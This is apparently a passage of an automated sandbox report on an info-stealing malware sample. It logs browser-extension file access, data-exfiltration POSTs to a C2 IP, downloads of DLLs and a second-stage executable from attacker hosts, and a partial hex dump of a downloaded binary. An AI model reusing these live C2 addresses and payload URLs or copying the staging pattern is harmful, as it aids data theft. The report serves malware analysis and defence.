                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199735694209
                    Source: global trafficTCP traffic: 192.168.2.5:64962 -> 91.92.246.78:2404
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 12 Jul 2024 08:38:34 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Wed, 10 Jul 2024 14:07:09 GMTETag: "13c06a-61ce529788cc5"Accept-Ranges: bytesContent-Length: 1294442Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 30 68 00 00 00 00 00 00 00 00 00 00 22 7a 13 00 48 46 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 30 68 00 00 00 40 0f 00 00 6a 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 b0 0f 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199735694209 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 65.109.241.221 65.109.241.221
                    Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
                    Source: Joe Sandbox ViewIP Address: 23.192.247.89 23.192.247.89
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBFCAFCBKFIEBFHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 5561Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqlt.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBFCAFCBKFIEBFHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 469Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 130441Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 498Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /webdav/Windows_Services_AS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 216.245.184.74Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: tea.arpdabl.orgContent-Length: 3217Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Connection: Keep-AliveCache-Control: no-cacheHost: survey-smiles.com
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0009279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_0009279E
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199735694209 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqlt.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /webdav/Windows_Services_AS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 216.245.184.74Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Connection: Keep-AliveCache-Control: no-cacheHost: survey-smiles.com
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: mwDBbeizpqpEEPNlGvI.mwDBbeizpqpEEPNlGvI
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: tea.arpdabl.org
                    Source: global trafficDNS traffic detected: DNS query: survey-smiles.com
                    Source: global trafficDNS traffic detected: DNS query: sJavUoBfFUhkoScDaBgelALGvfC.sJavUoBfFUhkoScDaBgelALGvfC
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: 65.109.241.221Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.245.184.74/webdav/Windows_Services_AS.exe
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://216.245.184.74/webdav/Windows_Services_AS.exe-data;
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://216.245.184.74/webdav/Windows_Services_AS.exe1kkkkken
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://crl.globalsign.com/root.crl0G
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://crl.globalsign.net/root.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
